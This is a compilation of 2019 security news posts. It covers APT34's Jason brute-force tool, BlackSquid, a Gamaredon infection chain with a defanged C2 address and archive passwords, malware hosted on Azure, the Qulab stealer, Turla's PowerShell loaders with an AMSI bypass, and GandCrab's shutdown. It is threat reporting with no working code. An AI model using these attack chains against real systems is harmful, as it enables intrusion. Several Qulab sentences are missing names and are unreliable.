A new wave of attacks involving PCASTLE malware are targeting systems located in China with the XMRig cryptocurrency miner. On 17 May, Trend Micro first observed a series of attacks that use PCASTLE, an obfuscated PowerShell script, to target mainly China-based systems with XMRig, cryptomining malware was involved in numerous attacks in 2018. The security […]… Read More

The post PCASTLE Malware Attacks Targeting China-Based Systems with XMRig appeared first on The State of Security.

Analyzing the APT34’s Jason project

Security expert Marco Ramilli has analyzed the recently leaked APT34 hacking tool tracked as Jason – Exchange Mail BF.

Today I want to share a quick analysis on a new leaked APT34 Tool in order to track similarities between APT34 public available toolsets. This time is the APT34 Jason – Exchange Mail BF project to be leaked by Lab Dookhtegan on June 3 2019.

Original Leak


According to FireEye, APT34 has been active since 2014. APT 34, also referred to as “OilRig” or Helix Kitten, has been known to target regional corporations and industries. Although there was information about APT34 prior to 2019, a series of leaks on the website Telegram by an individual named “Lab Dookhtegan”, including Jason project, exposed many names and activities of the organization.

“APT34 conducts cyber espionage on behalf of Iran. Iran seeks to diminish the capabilities of other regional powers to create leverage and better establish itself. This strategy is especially important against nations it sees as a threat to its regional power such as Saudi Arabia and the United Arab Emirates.”

Michael Lortz


Jason is a graphic tool implemented to perform Microsoft exchange account brute-force in order to “harvest” the highest possible emails and accounts information. Distributed in a ZIP container (a copy is available here) the interface is quite intuitive: the Microsoft exchange address and its version shall be provided (even if in the code a DNS-domain discovery mode function is available). Three brute-force methods could be selected: EWS (Exchange Web Service), OAB (Offline Address Book) or both (All). Username and password list can be selected (included in the distributed ZIP file) and threads number should be provided in order to optimize the attack balance.

Jason Project GUI

Deflating the ZIP container three artifacts are facing out. Jason.exe representing the graphic user interface and the main visible tool. Microsoft.Exchange.WebService.dll which includes the real functionalities used by Jason.exe, it’s a Microsoft developed library, PassSamplewhich includes some patterns implementation of possible Passwords (ie.[User@first]@@[user@first]123) and a folder named PasswordPatterswhich includes building blocks for password guessing. For example it wraps up a file called Year.txt including numbers from 1900 to 2020, a file called numspecial.txt including special numbers patterns and special chars patterns, a file called num4.txt including numbers from 0 to 999 and from 0002 (why not 0001 or 0000?) to 9998 (why not 9999?) and finally a file called num4special.txt including special number patters like: 1234,7890,0707, and so on and so forth.

Leaked ZIP content

Digging a little bit into the two Microsoft artifacts we might find out that both of them ( Jason.exe and Microsoft.Exchange.WebService.dll) have been written using .NET framework. The used .dll provides a managed interface for developing .NET client applications that use EWS. By using the EWS Managed API, the developer can access almost all the information stored in an Office 365, Exchange Online, or Exchange Server mailbox. The attacker used an old version of Microsoft.Exchange.WebService.dll tagged as which according to Microsoft documentation dates back to 2012.

WebService.dll assemply version

The last available Microsoft.Exchange.WebService.dll dates back to 2015, as shown in the following image, which might suggest a Jason dating period, even if it’s not an irrefutable evidence.

Last Microsoft Exchange WebServices dll version dates to 2015

Analyzing the reversed byte-code a real eye catcher (at least in my persona point of view) is in the “exception securities” that have been placed. In other words, the developer used many checks such as: variable checks, Nullbytes avoidance, objects indexes and object key checks in order to reduce the probability of not managed software exceptions. These “exception protections” are usually adopted in two main scenarios: (i) the end-user is not a super “techy” guy, so he might end-up with some unexpected conditions or (ii) the attacker is a professional developer who is trained to write product oriented code and not simple working software (which is what attackers usually do). The following images show a couple of code snippets in where the developer decided to protect codes from unexpected user behavior.

Basic exception prevention 1
Basic exception prevention 2

Comparing the code style with my previous analyses on APT34 (OilRig) which you might find here and here, we might observe a similar code protection. Even if the code language is different the similarity in the basic exception prevention from Jason and -for example- the “ script injection” function is very close. Another weak similarity is in the logging style. Jason and -for example- Glimpse project have a similar file logging function which includes string concatenation using special operators (no “flying casting” or “safe conversions”, ie: “%s”) and one line file logging into function focal points.

I am aware that these are weak similarities and there is no additional evidence or ties with previous leaked APT34 except for the trusted source (Lab Dookhtegan), so I am not giving any personal attribution since it gets very hard to attribute Jason directly to APT34 for what is known.

On the other hand Jason project doesn’t share the main source code language with previous APT34 analyses, it doesn’t include DNS tricks and or DNS usage evidences, it doesn’t include distinguishing patterns or language mistakes, it have been recompiled on January 2019 but using older technology. As already discussed it shares just few code style similarities with Glimpse and WebMask.

Additional technical details, including Yara Rules and IoCs, are reported in the original analysis published by Marco Ramilli on his blog:

About the author: Marco Ramilli, Founder of Yoroi

I am a computer security scientist with an intensive hacking background. I do have a MD in computer engineering and a PhD on computer security from University of Bologna. During my PhD program I worked for US Government (@ National Institute of Standards and Technology, Security Division) where I did intensive researches in Malware evasion techniques and penetration testing of electronic voting systems.

I do have experience in security testing since I have been performing penetration testing on several US electronic voting systems. I’ve also been encharged of testing uVote voting system from the Italian Minister of homeland security. I met Palantir Technologies where I was introduced to the Intelligence Ecosystem. I decided to amplify my cybersecurity experiences by diving into SCADA security issues with some of the biggest industrial aglomerates in Italy. I finally decided to found Yoroi: an innovative Managed Cyber Security Service Provider developing some of the most amazing cybersecurity defence center I’ve ever experienced! Now I technically lead Yoroi defending our customers strongly believing in: Defence Belongs To Humans

Edited by Pierluigi Paganini

(Security Affairs – Jason, APT34)

The post Analyzing the APT34’s Jason project appeared first on Security Affairs.

Smashing Security #131: Zap yourself from the net, and patch now against BlueKeep

Microsoft issues warning to unpatched Windows users about worm risk, and how do you delete all traces of yourself off the internet after your murder your podcast co-host?

All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault.

BlackSquid malware uses multiple exploits to drop cryptocurrency miners

A new piece of malware appeared in the threat landscape, dubbed BlackSquid it targets web servers with several exploits to deliver cryptocurrency miners.

Security experts at Trend Micro have discovered a new Monero cryptomining miner, dubbed BlackSquid, that is targeting web servers, network drives, and removable drives.

The new piece of malware leverages many exploits to compromise target systems and implements evasion techniques to avoid detection.

According to the experts, BlackSquid has worm-like propagation capabilities and it can be used to launch brute-force attacks.

“This malware, which we named BlackSquid after the registries created and main component file names, is particularly dangerous for several reasons.” states Trend Micro. “It employs anti-virtualization, anti-debugging, and anti-sandboxing methods to determine whether to continue with installation or not. It also has wormlike behavior for lateral propagation.”

The peculiarity of the BlackSquid malware is the employment of a set of the most dangerous exploits

While many forms of malicious code will employ one or two exploits for known vulnerabilities in popular systems, BlackSquid differs in this regard. 

The list of exploits used by the malware includes EternalBlue, DoublePulsar; exploits for CVE-2014-6287, Tomcat arbitrary file upload vulnerability CVE-2017-12615, CVE-2017-8464; and three ThinkPHP exploits for different versions of the framework.

The threat is delivered via infected webpages, exploits, or through removable network drives.

BlackSquid leverages the GetTickCount API to randomly select IP addresses of a web server and to attempt to infect them.

The malware implements anti-virtualization, anti-debugging, and anti-sandboxing methods to determine whether to deliver the miner or not.

“Simultaneous with its attacks, BlackSquid also downloads and executes two XMRig cryptocurrency-mining components.! continues the analysis. “The miner in resource is the primary miner used, but it also determines if the targeted system has a video card. If the system checks for Nvidia and AMD video cards using WQL (WMI Query Language, where WMI stands for Windows Management Instrumentation), the malware downloads the second component into the system to mine for graphics processing unit (GPU) resource.”

The malware halts the infection routine if at least one of the following conditions is met:

  • The victim’s username is included in a list of common sandbox usernames:
  • The disk drive model is equal to one included in a specific list;
  • The device driver, process, and/or dynamic link library is one of a specific list used by the malicious code.

BlackSquid exploits the EternalBlue-DoublePulsar exploits (MS17-010 SMB RCE exploit) to propagate through the target network. The malware uses the remote code execution (RCE) flaw to gain the same user rights as the local system user.

If the infected system has a video card such as Nvidia and AMD video cards using WQL (WMI Query Language, where WMI stands for Windows Management Instrumentation), the malicious code downloads a second component into the system to mine for graphics processing unit (GPU) resource.

Trend Micro says that the majority of BlackSquid attacks have, so far, been detected in Thailand and the United States. The last week of May is the most active period on record.

The presence of coding errors and skipped routine suggests that BlackSquid is still in the process of development and testing.

“Given its evasion techniques and the attacks it is capable of, BlackSquid is a sophisticated piece of malware that may cause significant damage to the systems it infects. If successful, this malware may enable an attacker to escalate unauthorized access and privileges, steal proprietary information, render hardware and software useless, or launch attacks on an organization (or even from an organization into another).” concludes Trend Micro.

“But considering the erroneous code and purposely skipped routines, we also think that the cybercriminals behind this malware are likely in the development and testing stages;”

Pierluigi Paganini

(SecurityAffairs – BlackSquid, hacking)

The post BlackSquid malware uses multiple exploits to drop cryptocurrency miners appeared first on Security Affairs.

A month later Gamaredon is still active in Eastern Europe

Gamaredon continues to target Ukraine, Yoroi-Cybaze ZLab spotted a new suspicious activity potentially linked to the popular APT group


The Gamaredon attacks against Ukraine don’t seem to have stopped. After a month since our last report we spotted a new suspicious email potentially linked to the Gamaredon group. The group was first discovered by Symantec and TrendMicro in 2015 but evidence of its activities has been dated back to 2013. During recent times, Gamaredon is targeting the Ukrainian military and law enforcement sectors too, as officially stated by the CERT-UA.

Cybaze-Yoroi ZLAB team dissected the artifact recovered from their latest attack to figure out evolution or changes in the threat actor TTPs.

Technical Analysis

Figure 1. Malicious e-mail 

The infection chain is composed by different stages of password protected SFX (self extracting archive), each containing vbs or batch scripts.

At the final stage of this malicious chain, we found a customized version of UltraVNC, a well known off-the-shelf tool for remote administration, modified by the Group and configured to connect to their command and control infrastructure. Despite its apparent triviality, the Matryoshka of SFX archives reached a low detection rate, making it effective.

Stage 1

ThreatGamaredon Pteranodon implant
Brief DescriptionSFX file
Ssdeep24576:PXwOrRsTyuURQFsVhIe74lpyevrM4vZxn6k1gQ Guo:PgwRAyuURQ2/1YpyeT7ok8

Table 1. Information about initial SFX file

The mail attachment is a RAR archive containing a folder named “suspected” in Ukrainan and a single suspicious file with “.scr” extension. At first glance, it is possible to notice the PowerPoint icon associated to the file, normally not belonging to .scr files.

Figure 2. Content of malicious e-mail
Figure 3. Low AV detection of SFX malware

The file has a very low detection rate on VirusTotal platform: only four AV engines are able to identify it as malicious and only on engine understands it may be associated to the Gamaredon implant.

After a quick analysis, the real nature of the .scr file emerges: it is a Self Extracting Archive containing all the files in Figure 4.

They are extracted into “%TEMP%\7ZipSfx.000\” and the first command to be executed is “15003.cmd”, which firstly checks for the presence of malware analysis tools. If it detects the presence of Wireshark or Procexp tools, it kill itself. Otherwise, it copies:

Figure 4. Content of SFX
  • the “11439” file in “%USERNAME%\winupd.exe”
  • the “28509” file in “%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\winupd.lnk” pointing to the previous executable and granting persistence to machine reboot
  • the “20261” file in “%TEMP%\7ZipSfx.000\Document.docx”
Figure 5. Script content in  “15003.cmd” file

At the same time, the extracted document will be shown in order to divert the user attention and to continue the infection unnoticed. This document, written in Ukraine language, contains information about a criminal charge.

Figure 6. Fake document to divert attention on malware execution
Figure 7. Execution of “winupd.exe” (SFX) and relative password (uyjqystgblfhs)

Instead, exploring the LNK file is possible to see it’s able to start the “winupd.exe” file, with a particular parameter: %USERPROFILE%\winupd.exe -puyjqystgblfhs. This behavior indicates the “winupd.exe” executable is another Self Extracting Archive, but this time it is password protected.

Stage 2

ThreatGamaredon Pteranodon implant
Brief DescriptionSFX file
Ssdeep24576:bGKUQ8Lj7S6Jr1ye4SM4vzxn3k1jQ GujR:biJr1yeNxJkro

Table 2. Information about second SFX file

When launched, it extracts its content in “%TEMP%\RarSFX0\”, then executes the “setup.vbs” script, which contains only two code lines. So, the execution flow moves on “1106.cmd”.

Figure 8. Content of “setup.vbs” script
Figure 9. Content of “%APPDATA%\Local\Temp\RarSFX0” after “winupd.exe” (SFX) extraction

The source code of “1106.cmd” is full of junk instructions. However, in the end it performs a simple action: it writes a new VBS script in “%APPDATA%\Microsoft\SystemCertificates\My\Certificates\” . This script tries to download another malicious file from “http://bitvers.ddns[.net/{USERNAME}/{DATE}/index.html”.  Performing many researches abot this server we noticed the continuously modification of associated records. Indeed, the attacker has changed many time the domain names in the latest period. Moreover, querying the services behind the latest associated DNS record the host responds with “403 Forbidden” message too, indicating the infrastructure may still be operative.

Figure 10. Information about C2 and relative DNS

The scripts creates a new scheduled task in order to periodically execute (every 20 mins) the previous VBS script.

Figure 11. POST request sent to C2 with victim machine information

Also, it collects all the information about the victim’s system using the legit “systeminfo” Microsoft tool and sends them to the remote server through a POST request using the “MicrosoftCreate.exe” file, which actually is the legit “wget” utility. The response body will contain a new executable file, named “jasfix.exe”, representing the new stage.

Stage 3

ThreatGamaredon Pteranodon implant
Brief DescriptionSFX file
Ssdeep24576:Gfxwgmyg5EOJ+IIpBz2GAROm560XVEC1Ng MdfaQbhUfEIg+m:GJpgIdPzeRBJVEC1CMd

Table 3. Information about third SFX file

After few researches, we were able to retrieve the “jasfix.exe” file, the next stage of the infection chain. After downloading it, we notice that it is another SFX archive other files.

Figure 12. Content of “jasfix.exe” (SFX) downloaded from the C2

The first file to be executed is “20387.cmd” that renames the “win.jpg” into “win.exe”, another password protected SFX.

Stage 4

ThreatGamaredon Pteranodon implant
Brief DescriptionSFX file
Ssdeep24576:9GKUQ8vCTAaaJVssTk3OwO+vl+3yt6Xf IAR:9vaJes2Ocl7t9S

Table 4. Information about fourth SFX file

This latest SFX archive follows the typical pattern of the Gamaredon archives Matryoshka, where the “.cmd” file is in designed to decrypt and run next stage. This time using the string “gblfhs” as password.

Figure 13. Script to rename “win.jpg” into “win.exe”, decrypt and run next stage
Figure 14. Content of “win.exe” (last SFX of infection)

However, the file named “win32.sys” is particularly interesting: it actually is a PE32 executable file. Exploring the “.rsrc” section of the PE32 executable, we noticed different “.class” files. Two of them are named “VncCanvas” and “VncViewer”. These files are part of a legit Remote Administration Tool (RAT) named UltraVNC, available at this link.

Figure 15. Content of “win32.sys”

The “win.exe” SFX archive contains other interesting files too: one of them is an “.ini” configuration file containing all the parameters and the password used by the UltraVNC tool.

Figure 16. Configuration file used by “win32.sys” (Custom ultraVNC)

Finally, the RAT tries to establish a connection to the “torrent-vnc[.ddns[.net” domain, headed to an endpoint reachable on, a VPS hosted by the Russian provider IPServer.

Figure 17. C2 and relative port used by RAT


This recent attack campaign shows the Gamaredon operation are still ongoing and confirms the potential Russian interest about infiltrating the East European ecosystem, especially the Ukranian one. The techniques and the infection patterns the Group is using is extremely similar to the other attacks spotted in the past months of 2019, showing the Matryoshka structure to chain SFX archives, typical of their implant, but still effective and not easily detectable by several antivirus engines.

Also, digging into this infection chain, we noticed the come back of third party RATs as payload, a Gamaredon old habit that the usage of the custom-made Pterodo backdoor replaced few times ago.

Acknowledgement: special thanks to @JAMESWT_MHT for info and samples.

Technical details, including IoCs and Yara Rules, are available in the analysis published in the Yoroi blog.

Pierluigi Paganini

(SecurityAffairs – Gamaredon, state-sponsored hacking)

The post A month later Gamaredon is still active in Eastern Europe appeared first on Security Affairs.

The Guardian view on cybercrime: the law must be enforced | Editorial

Governments and police must take crime on the internet seriously. It is where we all live now

About half of all property crime in the developed world now takes place online. When so much of our lives, and almost all of our money, have been digitised, this is not surprising – but it has some surprising consequences. For one thing, the decline in reported property crimes trumpeted by successive British governments between 2005 and 2015 turns out to have been an illusion. Because banks were not required to report fraud to the police after 2005, they often didn’t. It would have made both banks and police look bad to have all that crime known and nothing done about it. The cost of the resulting ignorance was paid by the rest of government, and by the public, too, deprived of accurate and reliable knowledge. Since then, the total number of property crimes reported has risen from about 6m to 11m a year as the figures have taken computerised crime into account.

The indirect costs to society are very much higher than the hundreds of millions that individuals lose. One example is the proliferation of plagiarism software online, which developed an entire industry in poor, English-speaking countries like Kenya, serving idle or ignorant students in England and North America. The effort required by schools and universities to guard against such fraud has been considerable, and its cost entirely disproportionate to the gains made by the perpetrators.

Continue reading...

Eurofins Scientific Says Ransomware Attack Disrupted Some IT Systems

Eurofins Scientific, an international group of laboratories headquartered in Brussels, revealed that a ransomware attack disrupted some of its IT systems. On 3 June, the food, pharmaceutical and environmental laboratory testing provider revealed that its IT security monitoring teams had discovered a ransomware attack over the weekend that had affected several of its IT systems. […]… Read More

The post Eurofins Scientific Says Ransomware Attack Disrupted Some IT Systems appeared first on The State of Security.

Threat actors abuse Microsoft Azure to Host Malware and C2 Servers

Microsoft Azure cloud services are being abused by threat actors to host malware and as command and control (C&C) servers.

Threat actors look with great interest at cloud services that could be abused for several malicious purposes, like storing malware or implementing command and control servers.

Now it seems to be the Microsoft Azure’s turn, recently experts reported several attacks leveraging the platform to host tech-support scam and phishing templates.

microsoft azure

Security researchers already spotted some malware hosted on the Microsoft Azure platform.

Researchers at AppRiver observed attackers deploying malware on the Microsoft Azure platform, the bad news is that those malicious codes were not removed after some weeks, on May 29.

“Now the attacks have escalated to malware being hosted on the Azure service. Not only is Azure hosting malware, it is also functioning as the command and control infrastructure for the malicious files” reads the analysis published by AppRiver.

“On May 11, 2019, malware researchers @JayTHL & @malwrhunterteam discovered the malicious software on Azure. It was reported to Microsoft on May 12 for abuse via ticket #SIR0552640.  However, the original malware (plus additional samples uploaded since) still resided on the Azure site as of May 29, 2019 – 17 days later.”

Experts pointed out that Azure is failing to detect the malware hosted on Microsoft’s servers.

“No service is infallible to being attacked or exploited. It’s evident that Azure is not currently detecting the malicious software residing on Microsoft’s servers. However, if a user attempts to download the executables, Windows Defender does detect the malicious files.”

In one case, a sample named searchfile.exe was uploaded to VirusTotal on April 26, 2019. Even is Windows Defender detects the malware its presence on Azure is not currently blocked. Unfortunately, experts reported many other similar cases.

Experts believe that this trend will continue to grow, threat actors will not only abuse Microsoft Azure, but other cloud services (i.e. Google Drive, Dropbox, and Amazon) will be exploited by attackers to avoid detection.

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Microsoft Azure, hacking)

The post Threat actors abuse Microsoft Azure to Host Malware and C2 Servers appeared first on Security Affairs.

How to Detect and Remove Malware from Websites

Hackers are always on the lookout for vulnerable websites into which they could inject malware and use the same to distribute malware or other potentially harmful applications into users’ systems/devices.

There are many kinds of malware that evade detection and stay inactive until the hacker sends a signal to allow a backdoor entry or to unpack and spread some malicious application into the website’s database. Thus, it’s important to detect malware presence on time so as to remove it before the payload is unleashed and damage caused, not only from the website security perspective but to the business and its reputation as well. There are certain signs that indicate the presence of malware on a website. Let’s examine these signs and also discuss how to remove malware from website to ensure website security –

How to detect malware presence on websites

  • Noticeable difference in website performance and traffic- There will be a noticeable difference in website performance, especially relating to the traffic. There will be a noticeable dip in the traffic. If this happens, it should be seen as the indicator of malware presence and needs to be investigated.
  • Apparent changes in the website’s looks- A malware leaves markers on webpages. If you happen to see changes in the text, the presence of images that weren’t uploaded by you or any other such changes in the website’s looks, you should start investigating for malware presence.
  • Webpages crashing or changes in files at the backend- When webpages crash as visitors try to access them or when there are unexpected changes in some files at the website’s backend, you must start looking for malware presence.
  • Unwarranted password changes and notifications- Website administrators, if they find that their websites show password changes or related notifications, should stay cautioned. It could be a malware infection. The hacker, using the malware, could be trying to take over the administrator’s account. Investigations have to be made for malware detection.
  • Notification from the web host, Google delisting- Upon finding irregularities, website administrators would be notified by the website hosting service providers. Similarly, Google would also tend to delist websites where unaddressed malware infection that could harm searchers is detected. Such things call for prompt investigation.

Website Malware Removal

Once you detect malware presence on your website, there are certain things that you need to do to get it removed. Here’s an overview-

  • Download website files- Website hosting providers may provide website administrators with tools that could help perform searches on the website files, look at the files from a command console and detect changes. But if there’s no such web console access, administrators should first download all of the website’s files on to their computer and then go for the searches.
  • Use PHP codes to do searches for malware- Security researchers share online the PHP codes of some common malware strains. Administrators could use these PHP codes to perform searches and look for malware presence.
  • Remove affected files, replace with clean copies- Once the affected files are found from the search done on website files, the tainted files have to be deleted and replaced with clean, untainted copies obtained from the backup. Once replaced, these files should be uploaded and the website would then be clean.

Website malware detection and removal tools also help

There are many website detection and removal tools that make it easy for malware detection and removal to be done. You could use any of these and do website malware detection and website malware removal in an effective manner.

Related Resources:

Weird Signs of Malware Infection

What’s New With Separ Malware Family in 2019

Automated Malware Analysis in the Cloud

Static Malware Analysis Vs Dynamic Malware Analysis

The post How to Detect and Remove Malware from Websites appeared first on .

Cryptocurrency Scammers Uses Youtube For Promotion

Are you a cryptocurrency enthusiast and loves watching Youtube videos about Bitcoins and other cryptocurrencies? If yes, then be very alert about Youtube channels you visit. Youtube, being the home of millions of content creators and online video consumers is teeming with scammers and phishers. Google has for quite some time is now actively taking down the videos hosting malicious links in the description portion of the video and even the entire Youtube channel. However, campaigns in Youtube promoting “Bitcoin generator” programs which claim as an easy way of creating bitcoins painlessly continue to rise one after another.

The Bitcoin generator tool is nothing but an espionage program that steals user information from the computer upon its execution. Videos promoting bitcoin generator website named continue to get re-uploaded on another Youtube channel once Google takes it down. Upon close inspection by researchers, the payload uses the infamous Qulab espionage trojan, which installs itself to Windows under the directory: %AppData%\amd64_microsoft-windows-netio-infrastructure under the file named msaudite.module.exe. The payload once installed in the system is able to gather information from .wallet files (cryptocurrency wallets), gather text information and save it to .txt files, browser persistent cookies, login credentials stored in the cache of Steam, FileZilla and Discord. Qulab trojan is also loaded with the capability to steal the information from the Windows clipboard, then immediately switch it with different data, which is useful when it comes to capturing cryptocurrency transfers.

Bitcoin generator, though using the name of Bitcoin supports the theft of other cryptocurrency aside from BTC. The following cryptocurrencies are also targeted by Bitcoin generator to monitor transactions with:

  • WMZ
  • WME
  • Qtum
  • Litecoin
  • Doge
  • Bytecoin
  • ZCash
  • WMX
  • VIA
  • QIWI
  • Graft
  • Dash
  • Bitcoin Gold
  • Yandex Money
  • WMU
  • Stratis
  • Neo
  • Ethereum
  • Lisk
  • Bitcoin Cash
  • Waves
  • WMR
  • Steam Trade Link
  • Monero
  • Electronium
  • Cardano

An extensive blog post on is posted which provides all the details on how Qulab performs its “magic” of stealing information beyond the scope of this article. According to, a more advanced version of Qulab has more capabilities beyond cryptocurrency wallet theft and other common keylogging techniques. Some of which are:

  • Browser stealing
  • Wallet Clipper
  • FTP creds
  • Discord / Telegram logs
  • Steam (Session / Trade links / 2FA Authenticator by abusing a third party software)
  • Telegram Bot through a proxy
  • Grabber

Qulab is a sophisticated trojan, as it was developed under a combination of modules programmed in Delphi, C, .NET and C++, which calls an exotic malware. Following the template set by AutoIT scripts (sold in the Dark Web), which automates trojan development through code-reuse or code-recycling. opened a GitHub page where a working proof-of-concept explaining the fundamentals of AutoIT is explained. “These libraries have been written to allow easy integration into your own scripts and are a very valuable resource for any programmer,” explained

The authors of Qulab provided a module within the malware code for itself to perform a “garbage collection” algorithm to bypass detection. With an entourage of features, Qulab uses a lot of memory, hence such portion of memory cannot be used by the operating system and other programs. With memory capacity reaching its full utilization, Windows will be forced to use the hard drive as virtual memory, which will be felt by end-users as the computer’s performance takes a hit.

Related Resources:

Malicious YouTube ads used to mine cryptocurrency

Scranos Rootkit Auto-Subscribes Users To Selected Youtube Channels

Youtube Video Content Creators and Channel Subscribers Cautioned Of Malicious Posers

The post Cryptocurrency Scammers Uses Youtube For Promotion appeared first on .

Security Affairs newsletter Round 216 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Kindle Edition

Paper Copy

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Police seized Bestmixer, the mixing service washed at least $200 million in a year
Remarks on NATO and its approach to the cyber offensive
Sectigo says that most of certificates reported by Chronicle analysis were already revoked
BlueKeep scans observed from exclusively Tor exit nodes
Crooks leverages .htaccess injector on Joomla and WordPress sites for malicious redirects
First American Financial exposed 16 years worth of personal and financial documents
Hacker breached Perceptics, a US maker of license plate readers
APT10 is back with two new loaders and new versions of known payloads
DuckDuckGo Address Bar Spoofing
Internet scans found nearly one million systems vulnerable to BlueKeep
Shade Ransomware is very active outside of Russia and targets more English-speaking victims
Siemens Healthineers medical products vulnerable to Windows BlueKeep flaw
All Docker versions affected by an unpatched race condition issue
Google white hat hacker found code execution flaw in Notepad
HawkEye Keylogger is involved in attacks against business users
News aggregator Flipboard disclosed a data breach
TA505 is expanding its operations
Using Public Wi-Fi? Your data can be hacked easily! Heres How…
Checkers double drive-thru restaurants chain discloses card breach
Convert Plus WordPress plugin flaw allows hackers to create Admin accounts
Emissary Panda APT group hit Government Organizations in the Middle East
Nansh0u campaign already infected 50,000 MS-SQL and PHPMyAdmin Servers
VPNpro research: this Chinese-linked company secretly owns 10 VPNs with 86 million installs
0patch released micropatch for BearLPE Zero-Day flaw in Windows 10 Task Scheduler
HiddenWasp, a sophisticated Linux malware borroes from Mirai and Azazel
Microsoft warns for the second time of applying BlueKeep patch
Security expert shows how to bypass macOS Gatekeeper
The Pyramid Hotel Group data leak exposes 85GB of security logs of major hotel chains
Apple updates address SQLite, WebKit issues in iTunes and iCloud for Windows
Cryptojacking campaign uses Shodan to scan for Docker hosts to hack
GandCrab operators are shutting down their operations
Russian military plans to replace Windows with Astra Linux

Pierluigi Paganini

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 216 – News of the week appeared first on Security Affairs.

ESET analyzes Turla APT’s usage of weaponized PowerShell

Turla, the Russia-linked cyberespionage group, is weaponizing PowerShell scripts and is using them in attacks against EU diplomats.

Turla (aka Snake, Uroburos, Waterbug, Venomous Bear and KRYPTON), the Russia-linked APT group, is using weaponized PowerShell scripts in attacks aimed at EU diplomats.

Turla group has been active since at least 2007 targeting government organizations and private businesses.

The list of previously known victims is long and includes also the Swiss defense firm RUAG, US Department of State, and the US Central Command.

Turla is back, in a recent wave of attacks, the cyberspies targeted diplomatic entities in Eastern Europe.

“To confound detection, its operators recently started using PowerShell scripts that provide direct, in-memory loading and execution of malware executables and libraries. This allows them to bypass detection that can trigger when a malicious executable is dropped on disk.” reads the report published by ESET.

The PowerShell scripts used by Turla in recent attacks allow direct, in-memory loading and execution of malicious executables and libraries avoiding detection.

Turla first used PowerShell in 2018, at the time experts from Kaspersky Labs collected evidence that demonstrated overlaps between the activity of Russian APT groups Turla and Sofacy. 

Turla attacks

Kaspersky Lab said the APT was experimenting with PowerShell in-memory loads to bypass security protections, at the time the loader used by the cyberspies was based on the legitimate PoshSec-Mod software. Anyway, experts believe that due to the presence of bugs in the code it would often crash.

ESET believes that now the problems have been solved and the Turla threat actors leverage the PowerShell scripts to load an array of malware.

“The PowerShell scripts are not simple droppers; they persist on the system as they regularly load into memory only the embedded executables.” continues the report.

We have seen Turla operators use two persistence methods:

  • A Windows Management Instrumentation (WMI) event subscription
  • Alteration of the PowerShell profile (profile.ps1 file).”

When the persistence is implemented through WMI, attackers create two WMI event filters and two WMI event consumers. The consumers are command lines launching base64-encoded PowerShell commands that load a PowerShell script stored in the Windows registry.

The second method used by the group consists of altering the PowerShell profile that is a script that runs when PowerShell starts.

In both cases the decryption of payloads stored in the registry is done using the 3DES algorithm. Once decrypted, a PowerShell reflective loader then comes into action.

“The payload decrypted at the previous step is a PowerShell reflective loader. It is based on the script Invoke-ReflectivePEInjection.ps1 from the same PowerSploit framework” reads the analysis.

“The executable is hardcoded in the script and is loaded directly into the memory of a randomly chosen process that is already running on the system,”

Attackers avoid targeting processes that could be specifically referred as legitimate defense solutions, such as the Kaspersky anti-virus protection software.

In some samples, Turla attackers have modified the PowerShell script in order to bypass the Antimalware Scan Interface (AMSI) implemented by Windows.

“This is an interface allowing any Windows application to integrate with the installed antimalware product. It is particularly useful for PowerShell and macros.” continues the report.

“They did not find a new bypass but re-used a technique presented at Black Hat Asia 2018 in the talk The Rise and Fall of AMSI. It consists of the in-memory patching of the beginning of the function AmsiScanBuffer in the library amsi.dll.”

The attackers are also able to modify the PowerShell script, in particular, the AmsiScanBuffer in a way that the antimalware product will not receive the buffer, which prevents any scanning.

The PowerShell loader is used to lauch malware, one of these malicious codes is a backdoor based on the RPC protocol.

Turla also has also a lightweight PowerShell backdoor in its arsenal, tracked as PowerStallion it uses cloud storage as C2 server.

A few weeks ago, ESET researchers discovered a Turla’s backdoor tracked as LightNeuron, that has been specifically developed to hijack Microsoft Exchange mail servers.

ESET confirmed that the PowerShell scripts have been used involved in campaigns aimed at political targets in Eastern Europe. According to the researchers the same scripts are also used globally against other targets in Western Europe and the Middle East.

“Finally, the usage of open-source tools does not mean Turla has stopped using its custom tools. The payloads delivered by the PowerShell scripts, the RPC backdoor and PowerStallion, are actually very customized. Our recent analysis of Turla LightNeuron is additional proof that this group is still developing complex, custom malware.” concludes the report.

ESET report includes technical details and IoCs associated with recent attacks.

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Turla, hacking)


The post ESET analyzes Turla APT’s usage of weaponized PowerShell appeared first on Security Affairs.

GandCrab operators are shutting down their operations

GandCrab first appeared in the threat landscape in early 2018 and continuously evolved over time. Now operators are shutting down their operations.

Early 2018, experts at cyber security firm LMNTRIX have discovered a new ransomware-as-a-service dubbed GandCrab. advertised in Russian hacking community on the dark web. The GandCrab was advertised in Russian hacking community, researchers noticed that authors leverage the RIG and GrandSoft exploit kits to distribute the malware.

In more than one year its operators released several versions with numerous enhancements, but now they are shutting down their operation and affiliates are being told to stop distributing the ransomware.

In October 2018, experts at the Cybaze Z-Lab have analyzed one of the latest iterations of the infamous GandCrab ransomware, the version 5.0.

Security researchers Damian and David Montenegro, who follow the evolution of the GandCrab since its appearance, the GandCrab operators announced their decision of shutting down their operation in a post in popular hacking forums:

The operators revealed they have generated more than $2 billion in ransom payments, earning on average of $2.5 million dollars per week. The operators revealed to have earned a net of $150 million that now have invested in legal activities.

GandCrab shutdown

Anyway, experts believe that the claims of $2 billion are not real, below an excerpt from a post published by Bleeping Computer:

“While the operators behind GandCrab most likely made many millions of dollars, the claims of $2 billion in ransom payments are very likely to be untrue.”

Operators will no more promote the GandCrab ransomware and asked the affiliates to stop distributing it within 20 days.

They are also warning victims that time is running out and they have to pay the ransom as soon as possible to avoid to lose their file forever.

It is not clear if the operators will release the keys after they will go out of the business.

Stay tuned …

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

